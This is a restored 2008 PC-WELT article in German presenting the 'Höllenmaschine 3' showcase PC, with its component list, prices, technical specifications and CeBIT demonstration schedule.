<p>Hinweis: Dieser Artikel erschien am 3. März 2008 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der dritten Höllenmaschine:</p>



<p>Herzschlagfinale: Diesmal haben wir wirklich auf den letzten Drücker den Herstellern die Prototypen für die CeBIT aus den Händen gerissen und sind trotzdem rechtzeitig fertig geworden. Deshalb können wir Ihnen auf dem Messegelände in Hannover unseren 30.000-Euro-Super-PC live in Aktion präsentieren:</p>



<p>Vom 4. bis 7. März 2008 ist die Höllenmaschine 3 zu Gast am Stand von <a href="https://web.archive.org/web/20080305171342/http:/www.tt-germany.com/" target="_blank" rel="noreferrer noopener">Thermaltake</a> (<strong>Halle 24, Stand C02</strong>). Und am CeBIT-Wochenende, vom 8. bis 9. März 2008, finden Sie unseren Traumrechner in der Messehalle von Intel (<strong>Pavillon P33</strong>, befindet sich zwischen Halle 12 und 26). Dort finden die <a href="https://web.archive.org/web/20080305171342/http:/www.esl-world.net/masters/cebit2008_eventpage/" target="_blank" rel="noreferrer noopener">Intel Extreme Masters II Finals der ESL</a> statt. Zwischen den Finalspielen präsentieren wir Ihnen auf der Showbühne am Samstag um 10:00, 12:30 und 16:45 Uhr sowie am Sonntag um 10:00, 12:15 und 16:45 Uhr die Höllenmaschine 3 live in Aktion.</p>



<p>Und wer es nicht zur CeBIT schafft, hat bei der <a href="https://web.archive.org/web/20080305171342/http:/www.dcmm.de/" target="_blank" rel="noreferrer noopener">Deutschen Casemod Meisterschaft 2008</a> eine weitere Gelegenheit, die Höllenmaschine 3 hautnah zu erleben. Der Wettbewerb, für den wir unseren 30.000-Euro-Rechner schon angemeldet haben, findet vom 19. bis 20. April 2008 auf der <a href="https://web.archive.org/web/20080305171342/http:/westfalenhallen.de/messen/hobbytronic/index.php" target="_blank" rel="noreferrer noopener">Hobbytronic</a> in Dortmund statt.</p>



<h2 class="wp-block-heading toc">Grafik: Quad SLI</h2>



<p>Der erste Prototyp, den wir bei der Höllenmaschine 3 einsetzen, kommt vom Grafikspezialisten <a href="https://web.archive.org/web/20080305171342/http:/www.nvidia.de/page/home.html" target="_blank" rel="noreferrer noopener">Nvidia</a>. Die Referenzkarte Nvidia Geforce 9800 GX2 beherbergt gleich zwei Grafikchips, die gemeinsam die 3D-Berechnung übernehmen. In der Höllenmaschine 3 haben wir zwei dieser Doppeldecker-Grafikkarten verbaut, die über ein spezielles Datenkabel (<a href="https://web.archive.org/web/20080305171342/http:/de.wikipedia.org/wiki/Scalable_Link_Interface" target="_blank" rel="noreferrer noopener">Scalable Link Interface Bridge</a>) verbunden sind. Dadurch beteiligen sich also insgesamt vier Grafikchips parallel an der 3D-Berechnung und arbeiten damit de facto im Quad-SLI-Modus.</p>



<p>Nvidias Doppeldecker-Grafikkarte Geforce 9800 GX2 besitzt gleich zwei externe Stromanschlüsse: eine 6- sowie eine 8-polige PCI-Express-Strombuchse. Wie viel die Geforce 9800 GX2 unter Volllast verbraucht, erfahren Sie nach der CeBIT in unserem großen Test zur Höllenmaschine 3.</p>



<p>Momentan verwenden wir die beiden Grafikkarten mit der von Nvidia entwickelten Kühler-Lüfter-Kombination. Die Zeit war für die kanadischen Kühlungsspezialisten von <a href="https://web.archive.org/web/20080305171342/http:/www.coolitsystems.com/" target="_blank" rel="noreferrer noopener">Coolit Systems</a> einfach zu knapp, um passende Kühlkörper anzufertigen, die für die Kompressorkühlung der Höllenmaschine 3 ausgelegt sind.</p>



<p>Daher laufen die zwei Geforce-9800-GX2-Grafikkarten derzeit noch mit den von Nvidia freigegebenen Standard-Taktraten. Aber bis spätestens Ende März 2008 sollte die Spezialanfertigung von Coolit Systems fertig sein – wir rüsten sie auf jeden Fall noch nach, um dann auch noch die Grafikkarten übertakten zu können.</p>



<p>Apropos Taktraten: Die Geforce 9800 GX2 möchte Nvidia offiziell erst Mitte März 2008 vorstellen. Damit wir die beiden High-End-Grafikkarten bereits jetzt in die Höllenmaschine 3 einbauen konnten, mussten wir eine Vertraulichkeitsvereinbarung (NDA, non-disclosure agreement) unterzeichnen, an die wir uns natürlich auch halten.</p>



<p>Deshalb können wir Ihnen momentan nicht allzu viel über das Grafikartengespann verraten. Wie das nebenstehende Bild zeigt, besitzt Nvidias Geforce 9800 GX2 zwei Dual-Link-DVI-Ausgänge zum Anschluss von zwei Bildschirmen. Zur Leistungsfähigkeit der Doppeldecker-Duos sei nur so viel gesagt: Selbst das derzeit hardwarehungrigste 3D-Spiel Crysis läuft mit höchster Bildqualität bei hohen Auflösungen flüssig. Wenn Sie auf der CeBIT sind, können Sie sich bei einer der vielen Live-Demonstrationen selbst überzeugen.</p>



<h2 class="wp-block-heading toc">Prozessoren: 8 x 4 GHz</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7a055"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Intel-Core-2-Extreme-QX9775.jpg?quality=50&amp;strip=all" alt="Intel Core 2 Extreme QX9775" class="wp-image-3185715" width="385" height="486" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Intel </p></div>



<p>Die beiden High-End-CPUs Intel Core 2 Extreme QX9775 zum Stückpreis von rund 1300 Euro arbeiten mit einem Werkstakt von 3,2 GHz – dank Kompressorkühlung laufen sie in der Höllenmaschine 3 stabil mit 4 GHz. Jedem Quad-Core steht ein gemeinsamer 12 MB großer L2-Cache zur Verfügung. Der Cache rechnet 24-fach assoziativ – das sorgt für eine effektivere Nutzung des Pufferspeichers.</p>



<p>Der Systemtakt des Core 2 Extreme QX9775 beträgt 400 (effektiv 1600) MHz. Damit erreicht der Transferdurchsatz, den jeder der beiden LGA771-Prozessoren pro Sekunde austauschen kann, bis zu 25,6 GB/s. Der 3,2-GHz-Quad-Core unterstützt <a href="https://web.archive.org/web/20080305174307/http:/www.tecchannel.de/server/hardware/402269/" target="_blank" rel="noreferrer noopener">Fully Buffered DIMM</a> der DDR2-Spezifikationen PC800 und PC667. Dass der Core 2 Extreme QX9775 Server-Speicher benötigt und den CPU-Steckplatz der Xeon-Baureihe nutzt, ist kein Zufall: Der QX9775 ist eigentlich ein Xeon X5482, dem Intel einen freien Multiplikator spendiert hat und ihn so zum „Extreme“-Prozessor aufgewertet.</p>



<p>Das Prozessor-Duo basiert auf Intels 45-Nanometer-Architektur „Harpertown“. Mit an Bord der neuen Architektur sind <a href="https://web.archive.org/web/20080305174307/http:/download.intel.com/technology/architecture/new-instructions-paper.pdf" target="_blank" rel="noreferrer noopener">47 Befehle der x86-Erweiterung SSE4</a>. Die neuen Instruktionen sollen vor allem Multimedia-Anwendungen wie Musik- und Video-Encodierung beschleunigen – sofern der Software-Hersteller die SSE4-Befehle in den Programmcode einpflegt.</p>



<p>Dies ist beispielsweise bei der aktuellen Version des Divx-Codecs und der Bildbearbeitung Adobe Photoshop der Fall. Aber auch 3D-Spiele soll SSE4 beschleunigen, etwa bei der Physikberechnung. Das ist aber noch Zukunftsmusik: Das erste Spiel, bei dem dies der Fall sein wird, ist der für Ende 2008 angekündigte Titel „Alan Wake“.</p>



<p>Mehrere Betriebssysteme: Der Core 2 Extreme QX9775 unterstützt die <a href="https://web.archive.org/web/20080305174307/http:/www.intel.com/technology/platform-technology/virtualization/index.htm" target="_blank" rel="noreferrer noopener">Virtualisierungs-Technik Intel VT</a> sowie 32-und 64-Bit-Betriebssysteme – interessant für Nutzer, die etwa virtuelle Server mit unterschiedlichen Betriebssystemen einrichten möchten. Mit einem Acht-Kern-System wie der Höllenmaschine 3, die ja auch beim Arbeitsspeicher nicht knausert, lässt sich da so einiges realisieren.</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 3 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Komponente</strong></td><td><strong>Modell</strong></td><td><strong>Preis</strong> <strong>(Euro)</strong> am 3.3.2008</td></tr><tr><td><strong>Hauptplatine</strong></td><td>Intel D5400XS “Skulltrail”  </td><td>500  </td></tr><tr><td><strong>Prozessor</strong></td><td>2 x Intel Core 2 Extreme QX9775, 3,2@4 GHz  </td><td>2600  </td></tr><tr><td><strong>Speicher</strong></td><td>4 x 2 GB Samsung PC800 FB-DIMM  </td><td>1000  </td></tr><tr><td><strong>Grafik</strong></td><td>2 x Nvidia Geforce 9800 GX2  </td><td>1500  </td></tr><tr><td><strong>Controller</strong></td><td>Adaptec ICP Vortex 5085BL, 8-Port, 256 MB RAM, PCI-E  </td><td>500  </td></tr><tr><td><strong>Festplatten</strong></td><td>4 x 300 GB Seagate Cheetah 15K.5 ST3300655SS, SAS  </td><td>2400  </td></tr><tr><td><strong>.</strong></td><td>4 x 1 TB Seagate Barracuda 7200.11 ST31000340AS, SATA 300  </td><td>1200  </td></tr><tr><td><strong>Brenner</strong></td><td>Bluray-HD-DVD-Laufwerk LG Electronics GGW-H20L, SATA  </td><td>400  </td></tr><tr><td><strong>Gehäuse</strong></td><td>Case-Mod “PC-WELT Höllenmaschine 3” auf Basis des Cube-Towers Thermaltake Mozart TX VE 1000BNS von Heiko Polaczek  </td><td>6000  </td></tr><tr><td><strong>Kompressor-Kühlung</strong></td><td>Coolit Systems Freezone Elite für CPUs (ab Ende März 2008 auch für GPUs und Chipsatz)  </td><td>4000  </td></tr><tr><td><strong>Netzteil</strong></td><td>Thermaltake Toughpower 2000W, ATX 12V 2.3, EPS 2.92  </td><td>400  </td></tr><tr><td><strong>Eingabegeräte</strong></td><td>Gyration Go 2.4 Optical Air und Media Center Remote Suite  </td><td>400  </td></tr><tr><td><strong>Bildschirme</strong></td><td>30-Zoll-Breitbild-TFT Eizo SX3031W  </td><td>2500  </td></tr><tr><td><strong>.</strong></td><td>7-Zoll-TFT-Touchscreen von Thermaltake, Laufwerkseinschub  </td><td>400  </td></tr><tr><td><strong>Betriebssystem</strong></td><td>Microsoft Windows 2008 Server und Vista Ultimate  </td><td>1800  </td></tr><tr><td><strong>Software</strong></td><td>Adobe Creative Suite 3 Master Collection  </td><td>3500  </td></tr><tr><td><strong>.</strong></td><td>Microsoft Office 2007 Professional    </td><td>500</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7a796"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/HM3-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="2008: Die Höllenmaschine 3" class="wp-image-3161808" width="1200" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Hauptplatine: Intel Skulltrail mit 8 GB RAM</h2>



<p>Wichtigstes Merkmal der rund 500 Euro teuren Intel D5400XS, Codename Skulltrail, sind die beiden LGA771-Prozessorsteckplätze – erst dadurch lassen sich die beiden Core 2 Extreme QX9775 parallel betreiben. Zu den weiteren Besonderheiten der Intel-Hauptplatine gehören zwei Nvidia-Chips namens Nforce 100 MCP. Sie bringen 32 zusätzliche PCI-Express-Datenleitungen sowie SLI-Unterstützung mit:</p>



<p>Damit kann Intel vier 16x-PCI-Express-Steckplätze auf der D5400XS unterbringen und diese auch jeweils 16fach elektrisch ansteuern. Da die beiden Nforce 100 MCP im Dauerbetrieb recht heiß werden, versieht Intel die zwei Nvidia-Chips inklusive der Northbridge mit einem Kühlkörper samt Lüfter.</p>



<p>Um die Stabilität der Höllenmaschine 3 zu erhöhen, wollen wir ab Mitte März die Intel-Lösung durch eine speziell angefertigte Kompressorkühlung unseres kanadischen Koopertionspartners Coolit Systems ersetzen.</p>



<p>Die Intel-Hauptplatine setzt auf den Server-Chipsatz 5400, Codename Seaburg. Beim 5400-Chipsatz arbeitet der Front Side Bus allerdings mit 400 (effektiv 1600) MHz. Den voll gepufferten DDR2-Speicher (FB-DIMM) bindet er ebenfalls mit 400 MHz ins System ein.</p>



<p>Die D5400XS im E-ATX-Format (305 x 330 Millimeter) sieht für jeden der vier FB-DIMM-Steckplätze einen eigenen Speicherkanal vor. Sowohl die Speichertaktraten als auch die RAM-Spannung lassen sich im BIOS der D5400XS manipulieren – ideal fürs Übertakten. Die maximale Ausbaustufe beträgt 8 GB fully buffered PC800- oder PC667-DDR2-SDRAM (4 x 2 GB).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7ae4d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Intel-D5400XS.jpg?quality=50&amp;strip=all&amp;w=992" alt="Intel D5400XS" class="wp-image-3185724" width="992" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Intel </p></div>



<p>Neben den vier 16x-PCI-Express-Steckplätzen, die allerdings nur den Standard PCI-Express 1.1 erfüllen, besitzt die Intel D5400XS noch zwei PCI-Steckplätze gemäß Version 2.3. Des Weiteren bietet die D5400XS-Hauptplatine noch einen Anschluss für zwei IDE-Laufwerke sowie üppige sechs SATA-300-Port inklusive zwei eSATA-Buchsen. Hinzu kommen zehn USB-2.0-Ports, zwei Firewire-Anschlüsse und eine 10/100/1000-MBit-Netzwerkbuchse. Bereits im Chipsatz integriert ist ein HD-Audiochip für 7.1-Raumklang mit einem optischen S/PDIF-Ausgang und den fünf üblichen Klinkenstecker-Buchsen.</p>



<h2 class="wp-block-heading toc">Arbeitsspeicher: 4 x 2 GB DDR2-SDRAM</h2>



<p>Wir bestücken alle vier Speicherbänke der Intel D5400XS mit Fully Buffered DDR2-800-SDRAM – und zwar mit den 2-GB-Modulen Samsung M395T5663QZ4-CF76. Die Speicherriegel nutzen zusätzliche Datenleitungen für die Datenintegritätsprüfung. Für eine schnellere Datenverarbeitung steht jedem Speichersteckplatz ein eigener Datenkanal zur Verfügung. Die FB-DIMM-Module laufen mit den Zugriffszeiten 666-11 und arbeiten mit effektiv 800 MHz.</p>



<h2 class="wp-block-heading toc">System-Festplatten: 4 x SAS </h2>



<p>Die Höllenmaschine 3 vertraut auf Server-Laufwerke für die Betriebssystem-Installationen. Dazu nutzen wir vier 300-GB-Festplatten mit der Punkt-zu-Punkt-Verbindung Serial Attached SCSI (SAS). SAS ist der Nachfolger der parallelen SCSI-Schnittstelle und bietet eine theoretische Datentransferrate von bis zu 300 MB/s, die sich im Gegensatz zu SATA 300 in der Praxis mit Raid-Konfigurationen auch tatsächlich annähernd erreichen lässt.</p>



<p>Unsere Wahl fiel auf das Modell Seagate Cheetah 15K.5 ST3300655SS mit 300 GB Kapazität. Preis pro Stück: rund 500 Euro. Das 3,5-Zoll-Laufwerk rotiert mit 15.000 Umdrehungen pro Minute, der Datenpuffer beträgt 16 MB. Die durchschnittliche Zugriffszeit der Cheetah 15K.4 liegt laut Hersteller bei 2 Millisekunden.</p>



<p>Die Zuverlässigkeit respektive MTBF (Mean Time Between Failures) der SAS-Laufwerke gibt Seagate mit 1,4 Millionen Betriebsstunden an. Die Annualized Failure Rate (AFR), also die Wahrscheinlichkeit, dass ein Laufwerk innerhalb eines Jahres ausfällt, liegt laut Hersteller bei 0,62 Prozent. Hier gibt’s detaillierte Informationen zur <a href="https://www.seagate.com/docs/pdf/de-DE/datasheet/disc/ds-cheetah-15k-5-de.pdf" target="_blank" rel="noreferrer noopener">Seagate Cheetah 15K.5 ST3300655SS</a>.</p>



<p>Noch mehr Tempo kitzeln wir aus der Cheetah 15K.5, indem wir die vier der SAS-Laufwerke mittels der PCI-Express-Controller-Karte Adaptec ICP Vortex 5085BL zu einem Raid-10-Verbund koppeln. Zwei Laufwerke fungieren dabei als Raid-0-Verbund: Dadurch lässt sich im Idealfall die Datentransferrate fast verdoppeln, da der SAS-Controller den Datenstrom in kleine Pakete zerlegt (Striping), die er simultan auf das Plattenduo schreibt beziehungsweise davon liest. Um eine hundertprozentige Datensicherheit zu gewährleisten, arbeiten die beiden anderen SAS-Laufwerke im Raid-1-Modus und spiegeln so den Datenbestand des Raid-0-Verbundes.</p>



<p>Umsonst gibt’s die Datensicherheit allerdings nicht: Durch den Raid-10-Verbund halbiert sich die nutzbare Kapazität des Laufwerk-Quartetts auf knapp 550 GB. Damit Systemprogramme und Applikationen möglichst verzögerungsfrei starten und arbeiten, haben wir die Betriebssysteme sowie alle Programme und Benchmarks auf der SAS-Partition installiert.</p>



<h2 class="wp-block-heading toc">Massenspeicher: 4 x 1000 GB</h2>



<p>Ausreichend Platz für umfangreiche Musik- und Video-Sammlungen gibt’s auf der zweiten Partition der Höllenmaschine 3: Sie besteht aus vier 1000-GB-Laufwerken des Typs Seagate Barracuda 7200.11 ST31000340AS, die für den 24-Stunden-Betrieb ausgelegt sind. Wir haben die vier Terabyte-Speichermonster ebenfalls zu einem Raid-10-Verbund gebündelt. Die Festplatten bieten dann zusammen eine formatierte Kapazität von knapp 1,9 Terabyte. Der Pufferspeicher der Barracuda 7200.11 beträgt übrigens 32 MB.</p>



<p>Die Barracuda 7200.11 setzt auf die SATA-300-Schnittstelle, die eine theoretische Transferrate von bis zu 300 MB/s erreicht. In der Praxis erzielen Sie diesen Wert zwar nicht, bei einem Raid-0-Verbund aus zwei Platten dürfen Sie aber durchschnittlich mit deutlich über 100 MB/s rechnen. Damit verwalten und archivieren Sie selbst große Videodateien sehr flott.</p>



<p>Die Seagate Barracuda 7200.11 ST31000340AS ist technisch auf der Höhe der Zeit: Das 3,5-Zoll-Laufwerk beherrscht die Technik Native Command Queuing (NCQ). NCQ erlaubt der Festplatte, die vom System geforderten Zugriffe selbstständig zu verwalten. Sie kann so die optimale Reihenfolge der Zugriffe ermitteln: Das spart zusätzliche Drehbewegungen, verkürzt damit die Wegstrecken, die der Schreib-/Lesekopf zurücklegen muss, und sorgt ergo für ein höheres Tempo.</p>



<p>Eine höhere Datenübertragungsrate lässt sich auch mit Perpendicular Recording erzielen, da die Datenbits nicht mehr horizontal, sondern vertikal auf dem Datenträger angeordnet sind. Auch diese moderne Technik setzt die Barracuda 7200.11 ein. Hier finden Sie detaillierte Informationen zur Spezifikation der <a href="https://www.seagate.com/docs/pdf/datasheet/disc/ds_barracuda_7200_11.pdf" target="_blank" rel="noreferrer noopener">Seagate Barracuda 7200.11 ST31000340AS</a>.</p>



<h2 class="wp-block-heading toc">Multi-Spieler: Blu-Ray, DVD und HD-DVD</h2>



<p>Die Höllenmaschine 3 haben wir zudem mit einem Blu-Ray-Brenner bestückt. Der LG Electronics GGW-H20L beschreibt BD-Rs, BD-REs sowie sämtliche DVD-Rohlingstypen und liest alle gängigen Medien, darunter auch HD-DVDs. Der Pufferspeicher des internen 3,5-Zoll-Laufwerks beträgt 4 MB.</p>



<p>Bei maximalem 6-fachem Schreibtempo schaufelt der GGW-H20L bis zu 26,3 MB pro Sekunde über die SATA-Schnittstelle und füllt so einen einlagigen 25-GB-BR-Rohling in rund 15 Minuten. BD-REs beschreibt der Blu-Ray-Brenner mit 2‑facher Geschwindigkeit. Blu-Ray-Medien liest der LG Electronics GGW-H20L ebenfalls mit 6-fachem Tempo und HD-DVDs immerhin mit 3-facher Geschwindigkeit.</p>



<p>DVDs sowie CDs liest der Blu-Ray-Brenner mit maximal 16- beziehungsweise 40-facher Geschwindigkeit, DVD-RAMs mit 5-fachem Tempo. DVD±Rs beschreibt das Laufwerk mit 16-fachem, DVD-RWs mit 6fachem und DVD+RWs mit 8fachem Tempo. Dual-Layer- und Double-Layer-DVD+Rs brennt das interne Laufwerk mit 4-facher Geschwindigkeit, DVD-RAMs mit 5-fachem Tempo. CD-Rs sowie CD-RWs beschreibt der Blu-Ray-Brenner mit 40‑fachem respektive 24‑fachem Tempo.</p>



<p>Im Lieferumfang des Blu-Ray-Laufwerks enthalten sind die Programme Cyberlink Power DVD7, Cyberlink Power Producer 4 und Power 2Go. Hinzu kommt ein BD-RE-Rohling mit 25 GB Kapazität. Neben dem GGW-H20L haben wir als zweites optisches Laufwerk einen DVD-Brenner von Samsung eingebaut.</p>



<h2 class="wp-block-heading toc">TFTs: 30-Zoll-Breitbild und 7-Zoll-Touchscreen</h2>



<p>Für viel Übersicht sorgt das 30-Zoll-Breitbild-TFT Eizo SX3031W für knapp 2500 Euro, das wir der Höllenmaschine 3 zur Seite stellen. Die physikalische Auflösung des LCD-Bildschirms beträgt 2560 x 1600 Bildpunkte. Zudem kann der Eizo-Bildschirm gängige PC-Auflösungen im 4-zu-3-Bildformat wie 1600 x 1200, 1280 x 1024, 1024 x 768 und 800 x 600 Bildpunkte sauber skalieren.</p>



<p>Die Helligkeit des TFTs mit einer Bildschirmdiagonalen von 75,6 Zentimetern liegt nach Herstellerangaben bei 260 cd/m² und das Kontrastverhältnis bei 900:1. Den horizontalen und vertikalen Blickwinkel gibt Eizo mit jeweils 178 Grad an. Die Horizontalfrequenz liegt zwischen 31 und 100 kHz, die Vertikalfrequenz bewegt sich zwischen 59 und 61 Hz. Die Reaktionszeit gibt Eizo mit 6 Millisekunden an.</p>



<p>Der 30-Zoll-Breitbild-TFT misst 68,9 x 48,9 x 27,2 Zentimeter (B x H x T). Der SX3031W bringt mit Standfuß 15,3 Kilogramm auf die Waage. Anschluss an die Höllenmaschine 3 findet der Bildschirm über einen der beiden DVI-D-Buchsen, davon ist eine als Dual-Link und eine als HDCP-kompatible Single-Link ausgelegt.</p>



<p>Alternativ kann der Eizo-Bildschirm an beiden DVI-I-Eingängen jeweils Single-Link-Signale zweier PCs oder zweier Grafikkartenanschlüsse verarbeiten. In diesem Fall zeigt der 30-Zoll-Breitbild-TFT die beiden Bilder nebeneinander (Picture-by-Picture) und kann so als 21-Zoll-Zweischirmlösung fungieren. Hier finden Sie detaillierte Informationen zum <a href="https://www.eizo.com.cy/support/db/products/software/SX3031W.html" target="_blank" rel="noreferrer noopener">Eizo SX3031W</a>.</p>



<p>Mehr Flexibilität: Der 7-Zoll-TFT-Touchscreen ist für den Cube-Tower Mozart TX VE 1000BNS von Thermaltake konzipiert – die Gehäusebasis der Höllenmaschine 3. Dabei ist der Bildschirm in einem Laufwerkseinschub integriert und lässt sich in die Gehäusefront versenken. Die physikalische Auflösung des Touchscreens beträgt 1280 x 768 Bildpunkte. Die Stromversorgung des LCD-Bildschirm erfolgt über das Netzteil der Höllenmaschine 3. Mit im Lieferumfang des 7-Zoll-TFTs befindet sich eine Infrarot-Fernbedienung.</p>



<h2 class="wp-block-heading toc">Stromversorgung: 2000 Watt </h2>



<p>Keine Kompromisse machen wir bei der Stromversorgung und setzen das stärkste Netzteil ein, das wir bekommen konnten: das Thermaltake Toughpower 2000W, ein weiterer Prototyp, den es derzeit noch nicht zu kaufen gibt. Das 2000-Watt-Kraftpaket erfüllt mit ATX 12V 2.3 sowie EPS 2.92 die aktuellen Spezifikationen für Desktop- und Server-Netzteile.</p>



<p>Das Thermaltake Toughpower 2000W besitzt zwei voneinander unabhängige 12-Volt-Schienen, die jeweils bis zu 80 Ampere Stromstärke liefern und unsere beiden Quad-Core-Prozessoren jeweils über zwei vierpolige CPU-Stromstecker versorgen. Ebenfalls auf dem neuesten Stand der Technik sind die sechs 8-poligen (6 + 2) PCI-Express-Stromstecker.</p>



<h2 class="wp-block-heading toc">Kompressorkühlung</h2>



<p>Bei der recht hohen Leistungsaufnahme – die exakten Verbrauchswerte liefern wir noch nach – ist für den stabilen Betrieb der Höllenmaschine 3 eine effiziente Kühlung der hitzigsten Komponenten unverzichtbar. Diese Aufgabe übernimmt diesmal ein Kompressorkühlungssystem von Coolit Systems.</p>



<p>Die Prozessoren kühlt das Modell Freezone Elite, das bis zu 250 Watt Verlustleistung aufnehmen kann. Auch die beiden Grafikkarten und der Hauptplatinen-Chipsatz werden von speziell angepassten Kompressorkühlungssystemen unseres Kooperationspartners Coolit Systems gekühlt. Details erfahren Sie, sobald wir die Höllenmaschine 3 mit den Sonderanfertigungen aufgerüstet haben.</p>



<h2 class="wp-block-heading toc">Gehäuse-Unikat: Casemod für 6000 Euro</h2>



<p>Für die Gestaltung des Gehäuses konnte die PC-WELT wieder den Modding-Profi Heiko Polaczek engagieren. Der auch unter dem Alias „Fastbrain1“ bekannte Polaczek, ist seit 15 Jahren eine feste Größe in der internationalen Casemoding-Szene.</p>



<p>Ebenfalls eine Szenengröße konnten wir für die Bemalung der Höllenmaschine 3 in Airbrush-Technik gewinnen. Der Experte ist allerdings so bescheiden, dass wir derzeit nur seinen Spitznamen nennen dürfen: old_airbrush.</p>



<p>Die Höllenmaschine 3 ins rechte Licht gerückt hat der bekannte Fotograf Florian Schiller – er hat langjährige Erfahrung mit Divas.</p>



<p>Der Casemod „PC-WELT Höllenmaschine 3“ summiert sich mit Material und Arbeitsaufwand auf rund 6000 Euro. Wie Heiko Polaczek und old_airbrush aus dem Cube-Tower unser exklusives Schmuckstück geformt haben, erfahren Sie in Kürze auf PC-WELT.tv in der Beitragsreihe „Making of Höllenmaschine 3“.</p>



<h2 class="wp-block-heading toc">Software: Luxus-Paket für 5000 Euro</h2>



<p>Die Adobe Creative Suite 3 Master Collection für knapp 3500 Euro enthält folgende Anwendungen: Acrobat 8 Professional, After Effects CS3 Professional, Contribute CS3, Dreamweaver CS3, Encore CS3, Fireworks CS3, Flash CS3 Professional, Illustrator CS3, InDesign CS3, Photoshop CS3 Extended, Premiere Pro CS3 und Soundbooth CS3.</p>



<p>Mit im Lieferumfang der Adobe Creative Suite 3 Master Collection sind die Zusatzfunktionen und -techniken Acrobat Connect, Bridge CS3, Device Central CS3, Dynamic Link CS3, OnLocation CS3, Stock Photos, Version Cue CS3 und Ultra CS3.</p>



<p>Egal, ob Sie die Höllenmaschine 3 als Render-Workstation, High-End-Spielerechner oder Virtualsierungs-Server verwenden wollen, mit den installierten Betriebssystemen Microsoft Windows Server 2008 sowie Microsoft Windows Vista Ultimate stehen Ihnen zahlreiche Einsatzmöglichkeiten offen.</p>



